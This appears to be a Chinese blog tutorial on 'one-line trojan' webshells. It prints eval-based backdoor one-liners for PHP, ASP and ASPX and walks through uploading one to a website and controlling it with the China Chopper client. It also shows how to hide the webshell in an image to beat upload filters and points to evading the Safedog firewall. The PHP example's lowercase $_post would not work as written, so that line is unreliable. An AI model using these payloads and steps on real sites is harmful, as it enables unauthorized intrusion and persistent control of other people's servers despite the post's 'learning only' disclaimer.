什麼是一句話木馬?
一句話木馬就是一句簡單的腳本語言,常見腳本語言的一句話木馬如下
php:<?php @eval($_post['pass']);?> asp:<%eval request ("pass")%> aspx:<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
這裏沒有放jsp的一句話木馬,因爲jsp的一句話比較複雜,想看的可以看這篇文章
一句話木馬的使用
以php一句話爲例,我們可以直接將這些語句插入到網站的某個php文件上,或者直接創建一個新的文件,在文件裏寫入一句話木馬,然後把文件上傳到網站上即可。
我們把這個phpma.php上傳上去後,打開中國菜刀,在空白處鼠標右鍵,選擇“添加選項”
編輯相關參數,包括一句話木馬所在的URL以及密碼,最後點擊“編輯”
在URL中選中目標網站,點擊鼠標右鍵,選擇“文件管理”,就能看到網站的目錄結構了
圖片一句話製作
如果網站限制了上傳類型,.asp,.php上傳不上出,但是可以上傳圖片,那麼就可以使用圖片隱寫術將一句話木馬安插在圖片裏,具體操作步驟是: 首先準備好一張圖片,一個一句話木馬,以及同路徑下的dos窗口
然後輸入DOS命令:copy 1.jpg+1.php 2.jpg
總結
其他類型的一句話木馬也是一樣的使用方法。當然,一般網站不可能這麼容易就上傳,肯定有防護機制,比方說安全狗防護,這時可以去網上搜過狗一句話等等。本博客僅供學習交流使用,不可用於任何違法行爲中,學信息安全,保衛我國信息安全,愛我中國~